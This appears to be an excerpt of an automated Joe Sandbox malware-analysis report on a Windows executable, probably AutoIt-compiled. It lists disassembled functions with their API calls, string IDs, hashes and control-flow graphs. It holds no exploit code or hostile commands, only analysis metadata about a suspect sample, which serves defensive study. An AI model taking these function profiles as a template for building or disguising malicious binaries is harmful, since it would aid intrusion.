                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                  • String ID: .lnk
                                                                                                                                  • API String ID: 2126378814-24824748
                                                                                                                                  • Opcode ID: 208d037e842f40e5c05a792a81bdffef41bdba26a5b5e1d4e9efe16eb39e9918
                                                                                                                                  • Instruction ID: 42f78989a57a8e41aad40df0fe3c9fb5e43d596ca1f1d204321fdacf14b28bfa
                                                                                                                                  • Opcode Fuzzy Hash: 208d037e842f40e5c05a792a81bdffef41bdba26a5b5e1d4e9efe16eb39e9918
                                                                                                                                  • Instruction Fuzzy Hash: 34A166356043499FCB10DF14C884D5ABBE5FF89324F148998F99AAB3A2CB31ED45CB91
                                                                                                                                  Function 00EB2B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                  • _memmove.LIBCMT ref: 00EB2C63
                                                                                                                                  • _memmove.LIBCMT ref: 00EB303A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 1300846289-2766056989
                                                                                                                                  • Opcode ID: e4dec72f7ee5313683a084118d9a735c2e44b31d69e4793a76cd09adbbd4e83b
                                                                                                                                  • Instruction ID: 9b75944f2e0fd5652dd9bc0001114e039b5e3d68b0ede2484b2ee476a8d17bce
                                                                                                                                  • Opcode Fuzzy Hash: e4dec72f7ee5313683a084118d9a735c2e44b31d69e4793a76cd09adbbd4e83b
                                                                                                                                  • Instruction Fuzzy Hash: 3EC28C74A00209DFCB14DFA8C881AEEB7B5BF48314F249059E916BB351DB35ED86DB90
                                                                                                                                  Function 00EADCD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: G-
                                                                                                                                  • API String ID: 0-177925756
                                                                                                                                  • Opcode ID: 87f692d2e2eef1395861f4e02f553026409a3dd0b98ebcd140ec669da0046dcb
                                                                                                                                  • Instruction ID: 0da1fe077fb21128c2f68a15da91ff102210ae129c9e4677a375cddd01c18db7
                                                                                                                                  • Opcode Fuzzy Hash: 87f692d2e2eef1395861f4e02f553026409a3dd0b98ebcd140ec669da0046dcb
                                                                                                                                  • Instruction Fuzzy Hash: 2122CD74A04205CFCB24DF58C890BAAF7F0FF1A314F149169E856AF791E731A985CB91
                                                                                                                                  Function 00EBDD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNEL32(00EAC848,00EAC848), ref: 00EBDDA2
                                                                                                                                  • FindFirstFileW.KERNEL32(00EAC848,?), ref: 00F14A83
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4185537391-0
                                                                                                                                  • Opcode ID: 58fbaa00b72831bf73c723c4dc5fc205b490e2a479218bfa3d3edb5dc0929721
                                                                                                                                  • Instruction ID: 9020e0308b72b28c7371d15720110eb79892dd34c2868e915df748e7281721d2
                                                                                                                                  • Opcode Fuzzy Hash: 58fbaa00b72831bf73c723c4dc5fc205b490e2a479218bfa3d3edb5dc0929721
                                                                                                                                  • Instruction Fuzzy Hash: 1BE0D8328145055B52246B38DC0D8EA375C9F45339B200705F875D14E0F774AD51A6DA
                                                                                                                                  Function 00EB3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3964851224-0
                                                                                                                                  • Opcode ID: b1f05c3423348da3ee18046c4720f1b9e4fa8aa285ee002a67075ca5de8621af
                                                                                                                                  • Instruction ID: 5b3b2dae23b4d20f2e3a4829b7d186aede7900aa4df6f38c121f500ab4be664c
                                                                                                                                  • Opcode Fuzzy Hash: b1f05c3423348da3ee18046c4720f1b9e4fa8aa285ee002a67075ca5de8621af
                                                                                                                                  • Instruction Fuzzy Hash: E9926B70608341CFD724DF28C491BABB7E1BF88304F14985DE99A9B2A2D771ED85CB52
                                                                                                                                  Function 00F1C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NameUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                  • Opcode ID: f7dbadec26b01dbb6f1b017778bf58b83574f27bf7eca78333b23602ec19c65f
                                                                                                                                  • Instruction ID: b8a3ef71f7e9b4e2bffc1943e39cca9928e1469fb5f81b9733815868207661ea
                                                                                                                                  • Opcode Fuzzy Hash: f7dbadec26b01dbb6f1b017778bf58b83574f27bf7eca78333b23602ec19c65f
                                                                                                                                  • Instruction Fuzzy Hash: 52C04CB240400DDFC715CB80C945AEFB7BCBB04300F104095A215E1010D7749B45AB71
                                                                                                                                  Function 00EAE1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EAE279
                                                                                                                                  • timeGetTime.WINMM ref: 00EAE51A
                                                                                                                                  • TranslateMessage.USER32(?), ref: 00EAE646
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00EAE651
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EAE664
                                                                                                                                  • LockWindowUpdate.USER32(00000000), ref: 00EAE697
                                                                                                                                  • DestroyWindow.USER32 ref: 00EAE6A3
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAE6BD
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00F15B15
                                                                                                                                  • TranslateMessage.USER32(?), ref: 00F162AF
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00F162BD
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F162D1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                  • API String ID: 2641332412-570651680
                                                                                                                                  • Opcode ID: 9c5a9f74534e9b40049783582c090d9762e052824b335c82b5deb398a18c85fa
                                                                                                                                  • Instruction ID: 8f15ef541fbdc69c62abb2322c26f521c0ea1da4ac28c3e161aa2a00c4ee2c2a
                                                                                                                                  • Opcode Fuzzy Hash: 9c5a9f74534e9b40049783582c090d9762e052824b335c82b5deb398a18c85fa
                                                                                                                                  • Instruction Fuzzy Hash: FB62F370508344DFDB24DF24C895BEA77E4BF89304F08186DE956AF292D774E888DB62
                                                                                                                                  Function 00ED6A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___createFile.LIBCMT ref: 00ED6C73
                                                                                                                                  • ___createFile.LIBCMT ref: 00ED6CB4
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00ED6CDD
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00ED6CE4
                                                                                                                                  • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00ED6CF7
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00ED6D1A
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00ED6D23
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00ED6D2C
                                                                                                                                  • __set_osfhnd.LIBCMT ref: 00ED6D5C
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6DC6
                                                                                                                                  • __close_nolock.LIBCMT ref: 00ED6DEC
                                                                                                                                  • __chsize_nolock.LIBCMT ref: 00ED6E1C
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6E2E
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6F26
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6F3B
                                                                                                                                  • __close_nolock.LIBCMT ref: 00ED6F9B
                                                                                                                                    • Part of subcall function 00ECF84C: CloseHandle.KERNEL32(00000000,00F4EEC4,00000000,?,00ED6DF1,00F4EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ECF89C
                                                                                                                                    • Part of subcall function 00ECF84C: GetLastError.KERNEL32(?,00ED6DF1,00F4EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ECF8A6
                                                                                                                                    • Part of subcall function 00ECF84C: __free_osfhnd.LIBCMT ref: 00ECF8B3
                                                                                                                                    • Part of subcall function 00ECF84C: __dosmaperr.LIBCMT ref: 00ECF8D5
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6FBD
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00ED70F2
                                                                                                                                  • ___createFile.LIBCMT ref: 00ED7111
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ED711E
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00ED7125
                                                                                                                                  • __free_osfhnd.LIBCMT ref: 00ED7145
                                                                                                                                  • __invoke_watson.LIBCMT ref: 00ED7173
                                                                                                                                  • __wsopen_helper.LIBCMT ref: 00ED718D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                  • String ID: 9A$@
                                                                                                                                  • API String ID: 3896587723-3249808769
                                                                                                                                  • Opcode ID: 6c62011464e4cad07b09adb4315b6f4b79e5634b77a11ad6ce85c428a686f41c
                                                                                                                                  • Instruction ID: 8e6743c1022ddd3ccc17ee8eff5226c2f44408b2356ceb4428e0852d0410e285
                                                                                                                                  • Opcode Fuzzy Hash: 6c62011464e4cad07b09adb4315b6f4b79e5634b77a11ad6ce85c428a686f41c
                                                                                                                                  • Instruction Fuzzy Hash: 3B2236719042099FEB289F68DD51BEE7B61EB00328F24622BE961BB3D2D7358D42D750
                                                                                                                                  Function 00EE76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00EE76ED
                                                                                                                                  • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00EE7713
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EE7741
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EE774C
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE7762
                                                                                                                                  • _wcsstr.LIBCMT ref: 00EE776D
                                                                                                                                  • 74D41560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00EE7789
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE77D2
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE77D9
                                                                                                                                  • _wcsncpy.LIBCMT ref: 00EE7804
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$FileInfoVersion$D41560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                  • API String ID: 716990576-1459072770
                                                                                                                                  • Opcode ID: 32a5051925a2e26e8b17af08bc259901b469f20ea4430fefa48559ee0789a554
                                                                                                                                  • Instruction ID: 033c1401f98795619ee4a5350775d46087b94aaedbbf0207bbd168b49ca8d5e1
                                                                                                                                  • Opcode Fuzzy Hash: 32a5051925a2e26e8b17af08bc259901b469f20ea4430fefa48559ee0789a554
                                                                                                                                  • Instruction Fuzzy Hash: 3E415772904208BADB01A7649D47FBF77ECEF59360F14105EF901B6183EB75EA02D6A1
                                                                                                                                  Function 00EA1F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 608 ea1f04-ea1f9c call ea2d1a * 2 call eac935 * 2 call ea7e53 call ead3d2 * 3 625 f12569-f12575 call ec2626 608->625 626 ea1fa2-ea1fa6 608->626 629 f1257d-f12583 call ede4ea 625->629 628 ea1fac-ea1faf 626->628 626->629 631 f1258f-f1259b call eaa4f6 628->631 632 ea1fb5-ea1fb8 628->632 629->631 639 f125a1-f125b1 call eaa4f6 631->639 640 f12899-f1289d 631->640 632->631 635 ea1fbe-ea1fc7 GetForegroundWindow call ea200a 632->635 641 ea1fcc-ea1fe3 call ea197e 635->641 639->640 654 f125b7-f125c5 639->654 642 f128ab-f128ae 640->642 643 f1289f-f128a6 call eac935 640->643 651 ea1fe4-ea2007 call ea5cd3 * 3 641->651 648 f128b0 642->648 649 f128b7-f128c4 642->649 643->642 648->649 652 f128d6-f128da 649->652 653 f128c6-f128d4 call eab8a7 CharUpperBuffW 649->653 658 f128f1-f128fa 652->658 659 f128dc-f128df 652->659 653->652 657 f125c9-f125e1 call edd68d 654->657 657->640 672 f125e7-f125f7 call ebf885 657->672 664 f1290b EnumWindows 658->664 665 f128fc-f12909 GetDesktopWindow EnumChildWindows 658->665 659->658 663 f128e1-f128ef call eab8a7 CharUpperBuffW 659->663 663->658 666 f12911-f12930 call ede44e call ea2d1a 664->666 665->666 683 f12940 666->683 684 f12932-f1293b call ea200a 666->684 681 f1287b-f1288b call ebf885 672->681 682 f125fd-f1260d call ebf885 672->682 692 f12873-f12876 681->692 693 f1288d-f12891 681->693 690 f12861-f12871 call ebf885 682->690 691 f12613-f12623 call ebf885 682->691 684->683 690->692 702 f12842-f12848 GetForegroundWindow 690->702 700 f12629-f12639 call ebf885 691->700 701 f1281d-f12836 call ee88a2 IsWindow 691->701 693->651 696 f12897 693->696 697 f12852-f12858 696->697 697->690 711 f12659-f12669 call ebf885 700->711 712 f1263b-f12640 700->712 701->651 709 f1283c-f12840 701->709 703 f12849-f12850 call ea200a 702->703 703->697 709->703 720 f1266b-f12675 711->720 721 f1267a-f1268a call ebf885 711->721 713 f12646-f12657 call ea5cf6 712->713 714 f1280d-f1280f 712->714 722 f1269b-f126a7 call ea5be9 713->722 717 f12817-f12818 714->717 717->651 723 f127e6-f127f0 call eac935 720->723 728 f126b5-f126c5 call ebf885 721->728 729 f1268c-f12698 call ea5cf6 721->729 734 f12811-f12813 722->734 735 f126ad-f126b0 722->735 733 f12804-f12808 723->733 739 f126e3-f126f3 call ebf885 728->739 740 f126c7-f126de call ec2241 728->740 729->722 733->657 734->717 735->733 745 f12711-f12721 call ebf885 739->745 746 f126f5-f1270c call ec2241 739->746 740->733 751 f12723-f1273a call ec2241 745->751 752 f1273f-f1274f call ebf885 745->752 746->733 751->733 757 f12751-f12768 call ec2241 752->757 758 f1276d-f1277d call ebf885 752->758 757->733 763 f12795-f127a5 call ebf885 758->763 764 f1277f-f12793 call ec2241 758->764 769 f127c3-f127d3 call ebf885 763->769 770 f127a7-f127b7 call ebf885 763->770 764->733 775 f127f2-f12802 call edd614 769->775 776 f127d5-f127da 769->776 770->692 777 f127bd-f127c1 770->777 775->692 775->733 778 f12815 776->778 779 f127dc-f127e2 776->779 777->733 778->717 779->723
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00EA1FBE
                                                                                                                                  • IsWindow.USER32(?), ref: 00F1282E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Foreground_memmove
                                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                  • API String ID: 3828923867-1919597938
                                                                                                                                  • Opcode ID: 44d3b2347f9ee98cf0434b240ccafd60ad8b1190ecc11a4dd3d16b8379a178f4
                                                                                                                                  • Instruction ID: 67061daa5994f8b222e825c8698df0e791c963f06d1f856b59959bec82c61fcd
                                                                                                                                  • Opcode Fuzzy Hash: 44d3b2347f9ee98cf0434b240ccafd60ad8b1190ecc11a4dd3d16b8379a178f4
                                                                                                                                  • Instruction Fuzzy Hash: 00D10E30504202DFCB48EF54C880ADAB7E1FF59360F145A1DF455675A2DB30F9AAEB92
                                                                                                                                  Function 00F0352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
